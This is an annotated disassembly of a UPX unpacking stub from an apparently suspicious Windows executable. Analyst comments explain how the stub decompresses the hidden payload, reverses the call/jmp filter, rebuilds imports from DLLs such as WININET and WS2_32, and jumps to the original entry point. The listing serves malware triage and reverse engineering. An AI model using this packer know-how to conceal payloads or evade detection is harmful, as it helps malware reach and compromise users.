;   1. inflates the compressed stream into the region starting at
;      esi-4000h (401000h, the UPX0 segment),
;   2. undoes the E8/E9 call/jmp address filter over that region,
;   3. rebuilds the payload's import table through the three loader
;      imports kept in UPX2,
;   4. restores the registers and jumps to loc_402E30, the payload's
;      original entry point.
;
; NOTE(review): this listing was produced from an already-unpacked image, so
; dword_405000 no longer shows the compressed stream the stub consumed. Its
; first bytes are the import-name table read at loc_40704C (0C4h, 40h,
; 01,'VirtualFree',0, ...).
;
; Register roles while decompressing:
;   esi = read pointer into the compressed stream
;   edi = write pointer; its initial value is pushed and popped again at
;         loc_407012 as the base of the unpacked region
;   ebx = bit buffer; `add ebx, ebx` leaving zero means "refill needed"
;   ebp = current match offset (negative distance), initialised to -1
;   ecx = match length
;   eax = scratch / offset accumulator
;
; Triage notes: UPX0 and UPX1 are both mapped Read/Write/Execute, and the
; stub is bracketed by pusha ... popa followed by a long jmp; both are common
; packer indicators. The popa/jmp pair at loc_407097 marks the point at which
; the payload is fully unpacked in memory.
; ---------------------------------------------------------------------------
                public start
start:
                pusha                           ; save all registers; restored by popa at loc_407097
                mov     esi, offset dword_405000 ; source = packed data in UPX1
                lea     edi, [esi-4000h]        ; destination = 401000h (start of UPX0)
                push    edi                     ; remember the destination base for the post-processing passes
                or      ebp, 0FFFFFFFFh         ; last match offset = -1
                jmp     short loc_406F62        ; start by filling the bit buffer
; ---------------------------------------------------------------------------
                align 8

loc_406F58:                                     ; CODE XREF: UPX1:loc_406F69j
                                                ; literal: copy one byte from the stream to the output
                mov     al, [esi]
                inc     esi
                mov     [edi], al
                inc     edi

loc_406F5E:                                     ; CODE XREF: UPX1:00406FF6j
                                                ; UPX1:0040700Dj
                                                ; main loop: fetch the next control bit into CF
                add     ebx, ebx
                jnz     short loc_406F69        ; buffer still holds data bits

loc_406F62:                                     ; CODE XREF: UPX1:00406F50j
                mov     ebx, [esi]              ; refill: next 32 bits of the stream
                sub     esi, 0FFFFFFFCh         ; esi += 4, written as a subtract so CF ends up set
                adc     ebx, ebx                ; top bit -> CF; the set CF is shifted in as the end marker

loc_406F69:                                     ; CODE XREF: UPX1:00406F60j
                jb      short loc_406F58        ; control bit 1 -> literal byte
                mov     eax, 1                  ; control bit 0 -> match; decode the offset prefix into eax

loc_406F70:                                     ; CODE XREF: UPX1:00406F7Fj
                                                ; UPX1:00406F8Aj
                                                ; variable-length code: one data bit, then one continue/stop bit
                add     ebx, ebx
                jnz     short loc_406F7B
                mov     ebx, [esi]              ; refill (same idiom as loc_406F62)
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_406F7B:                                     ; CODE XREF: UPX1:00406F72j
                adc     eax, eax                ; append the data bit
                add     ebx, ebx
                jnb     short loc_406F70        ; stop bit 0 -> keep reading
                jnz     short loc_406F8C        ; stop bit 1 and buffer not empty -> done
                mov     ebx, [esi]              ; the bit shifted out was the end marker: refill and re-test
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_406F70

loc_406F8C:                                     ; CODE XREF: UPX1:00406F81j
                xor     ecx, ecx                ; match length accumulator = 0
                sub     eax, 3
                jb      short loc_406FA0        ; prefix was 2 -> reuse the previous offset in ebp
                shl     eax, 8                  ; otherwise offset = ((prefix-3) << 8) | next stream byte
                mov     al, [esi]
                inc     esi
                xor     eax, 0FFFFFFFFh         ; complement -> negative distance
                jz      short loc_407012        ; value 0FFFFFFFFh is the end-of-stream marker
                mov     ebp, eax                ; remember as the current match offset

loc_406FA0:                                     ; CODE XREF: UPX1:00406F91j
                                                ; match length: first two bits into ecx
                add     ebx, ebx
                jnz     short loc_406FAB
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_406FAB:                                     ; CODE XREF: UPX1:00406FA2j
                adc     ecx, ecx
                add     ebx, ebx
                jnz     short loc_406FB8
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_406FB8:                                     ; CODE XREF: UPX1:00406FAFj
                adc     ecx, ecx
                jnz     short loc_406FDC        ; non-zero two-bit value is the short length code
                inc     ecx                     ; both bits 0 -> long length, same code shape as the offset prefix

loc_406FBD:                                     ; CODE XREF: UPX1:00406FCCj
                                                ; UPX1:00406FD7j
                add     ebx, ebx
                jnz     short loc_406FC8
                mov     ebx, [esi]              ; refill
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx

loc_406FC8:                                     ; CODE XREF: UPX1:00406FBFj
                adc     ecx, ecx                ; append the data bit
                add     ebx, ebx
                jnb     short loc_406FBD        ; stop bit 0 -> keep reading
                jnz     short loc_406FD9
                mov     ebx, [esi]              ; end marker shifted out: refill and re-test
                sub     esi, 0FFFFFFFCh
                adc     ebx, ebx
                jnb     short loc_406FBD

loc_406FD9:                                     ; CODE XREF: UPX1:00406FCEj
                add     ecx, 2                  ; bias for the long length code

loc_406FDC:                                     ; CODE XREF: UPX1:00406FBAj
                cmp     ebp, 0FFFFF300h         ; CF set when the distance exceeds 0D00h
                adc     ecx, 1                  ; length += 1, plus 1 more for such far matches
                lea     edx, [edi+ebp]          ; edx = match source inside the output already written
                cmp     ebp, 0FFFFFFFCh
                jbe     short loc_406FFC        ; distance >= 4 -> dword-at-a-time copy is safe

loc_406FED:                                     ; CODE XREF: UPX1:00406FF4j
                                                ; distance < 4: source and destination overlap, copy bytewise
                mov     al, [edx]
                inc     edx
                mov     [edi], al
                inc     edi
                dec     ecx
                jnz     short loc_406FED
                jmp     loc_406F5E
; ---------------------------------------------------------------------------
                align 4

loc_406FFC:                                     ; CODE XREF: UPX1:00406FEBj
                                                ; UPX1:00407009j
                                                ; fast path: copy the match four bytes at a time
                mov     eax, [edx]
                add     edx, 4
                mov     [edi], eax
                add     edi, 4
                sub     ecx, 4
                ja      short loc_406FFC        ; loop while more than 0 bytes remain
                add     edi, ecx                ; ecx <= 0 here: back edi up over any overshoot
                jmp     loc_406F5E
; ---------------------------------------------------------------------------

loc_407012:                                     ; CODE XREF: UPX1:00406F9Cj
                                                ; decompression finished: undo the call/jmp filter
                pop     esi                     ; esi = base of the unpacked region (pushed at start)
                mov     edi, esi
                mov     ecx, 91h                ; number of filtered call/jmp operands to restore

loc_40701A:                                     ; CODE XREF: UPX1:00407021j
                                                ; UPX1:00407026j
                mov     al, [edi]
                inc     edi
                sub     al, 0E8h                ; al = 0 for opcode E8 (call), 1 for E9 (jmp)

loc_40701F:                                     ; CODE XREF: UPX1:00407044j
                cmp     al, 1
                ja      short loc_40701A        ; not E8/E9 -> keep scanning
                cmp     byte ptr [edi], 1       ; filtered operands carry 01 as their first byte
                jnz     short loc_40701A
                mov     eax, [edi]              ; operand bytes: 01 b1 b2 b3
                mov     bl, [edi+4]             ; pre-read the byte after the operand (next opcode candidate)
                shr     ax, 8                   ; drop the 01 marker ...
                rol     eax, 10h
                xchg    al, ah                  ; ... and byte-swap: eax = b1:b2:b3 read as big-endian
                sub     eax, edi                ; stored value is an offset from the base; convert it
                sub     bl, 0E8h
                add     eax, esi                ;   back into a displacement relative to this instruction
                mov     [edi], eax
                add     edi, 5                  ; skip the operand and the pre-read byte
                mov     eax, ebx                ; al = pre-read byte - 0E8h, tested on the next pass
                loop    loc_40701F

                ; Import rebuild. edi walks a table at base+4000h made of records:
                ;   dd dll_name_offset, dd iat_offset, then entries, then a 0 byte.
                ; [esi+708Ch], [esi+7090h] and [esi+7094h] are the three thunk
                ; slots at 40808Ch in UPX2; by usage and by the order of the names
                ; stored there they are LoadLibraryA, GetProcAddress and ExitProcess.
                lea     edi, [esi+4000h]

loc_40704C:                                     ; CODE XREF: UPX1:0040706Ej
                mov     eax, [edi]              ; DLL-name offset; 0 terminates the table
                or      eax, eax
                jz      short loc_407097
                mov     ebx, [edi+4]            ; offset of this DLL's IAT slots
                lea     eax, [eax+esi+7000h]    ; -> DLL name string in UPX2 (408000h + offset)
                add     ebx, esi                ; ebx = address of the first IAT slot to fill
                push    eax
                add     edi, 8
                call    dword ptr [esi+708Ch]   ; load the DLL by name
                xchg    eax, ebp                ; ebp = module handle

loc_407069:                                     ; CODE XREF: UPX1:0040708Fj
                mov     al, [edi]               ; entry type byte
                inc     edi
                or      al, al
                jz      short loc_40704C        ; 0 -> end of this DLL's entries
                mov     ecx, edi                ; large count for the string scan below
                ; Type byte with the sign bit clear = import by name. The jump target
                ; is one byte INTO the next instruction: `mov ecx, 0AEF24857h`
                ; encodes as B9 57 48 F2 AE, so entering at +1 executes
                ;   push edi / dec eax / repne scasb
                ; which pushes the name pointer and advances edi past its NUL
                ; (for a type byte of 01 the dec leaves al = 0). A linear
                ; disassembly hides this path, so read it as overlapping code.
                jns     short near ptr loc_40707A+1
                movzx   eax, word ptr [edi]     ; sign bit set = import by ordinal: 16-bit ordinal follows
                inc     edi
                push    eax
                inc     edi

loc_40707A:                                     ; CODE XREF: UPX1:00407072j
                                                ; DATA XREF: UPX0:0040484Co ...
                mov     ecx, 0AEF24857h         ; on the ordinal path this only swallows the name-path bytes
                push    ebp                     ; module handle
                call    dword ptr [esi+7090h]   ; resolve the export (by name or ordinal)
                or      eax, eax
                jz      short loc_407091        ; unresolved import -> give up
                mov     [ebx], eax              ; store the address in the payload's IAT
                add     ebx, 4
                jmp     short loc_407069
; ---------------------------------------------------------------------------

loc_407091:                                     ; CODE XREF: UPX1:00407088j
                call    dword ptr [esi+7094h]   ; terminate the process on import failure

loc_407097:                                     ; CODE XREF: UPX1:00407050j
                popa                            ; restore the registers saved at start
                jmp     loc_402E30              ; transfer to the unpacked payload's original entry point
; ---------------------------------------------------------------------------
                align 1000h
UPX1            ends

; Section 3. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2            segment para public 'DATA' use32
                assume cs:UPX2
                ;org 408000h
                ; The packed file's own import directory. Read as 20-byte import
                ; descriptors, each record is three zero fields followed by a
                ; (Name RVA, FirstThunk RVA) pair: 80C4h lands on 'KERNEL32.DLL'
                ; and 808Ch on the three-entry thunk list below. The trailing
                ; 5 dup(0) is the all-zero terminating descriptor.
                dd 3 dup(0)
                dd 80C4h, 808Ch, 3 dup(0)
                dd 80D1h, 809Ch, 3 dup(0)
                dd 80DEh, 80A4h, 3 dup(0)
                dd 80E9h, 80ACh, 3 dup(0)
                dd 80F4h, 80B4h, 3 dup(0)
                dd 8100h, 80BCh, 5 dup(0)
                ; 40808Ch: KERNEL32 thunks used by the stub as [esi+708Ch], [esi+7090h]
                ; and [esi+7094h]. They already hold resolved addresses in this dump.
                dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
                ; 40809Ch: ADVAPI32 thunk (same value as the RegCloseKey slot in UPX0)
                dd 77DD6BF0h, 0
                ; NOTE(review): the next four "strings" sit exactly at the FirstThunk
                ; RVAs 80A4h/80ACh/80B4h/80BCh listed above, so they are almost
                ; certainly 4-byte resolved thunk values that IDA rendered as text,
                ; not real strings. Do not treat them as string indicators.
aQW             db 'ÓqÃw',0
                align 4
aNia            db '­¨A~',0
                align 4
aBB             db '¡ÈÂB',0
                align 4
aKblq           db 'ŠB«q',0
                align 4
                ; DLL names referenced by the descriptors above
aKernel32_dll   db 'KERNEL32.DLL',0
aAdvapi32_dll   db 'ADVAPI32.dll',0
aMsvcrt_dll     db 'MSVCRT.dll',0
aUser32_dll     db 'USER32.dll',0
aWininet_dll    db 'WININET.dll',0
aWs2_32_dll     db 'WS2_32.dll',0
                align 4
                ; Names of the few imports the loader resolves for the stub itself
aLoadlibrarya   db 'LoadLibraryA',0
                align 2
aGetprocaddress db 'GetProcAddress',0
                align 2
aExitprocess    db 'ExitProcess',0
                align 4
aRegclosekey    db 'RegCloseKey',0
                ; More import-by-name entries that IDA left as dwords; read as
                ; little-endian bytes they spell 'rand', 'wsprintfA' and
                ; 'InternetOpenA', each preceded by a zero hint word.
                dd 61720000h, 646Eh, 72707377h, 66746E69h, 41h, 65746E49h
                dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2            ends

; Section 4. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00009000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2         segment para public 'DATA' use32
                assume cs:_idata2
                ;org 409000h
                align 2000h
_idata2         ends

                end start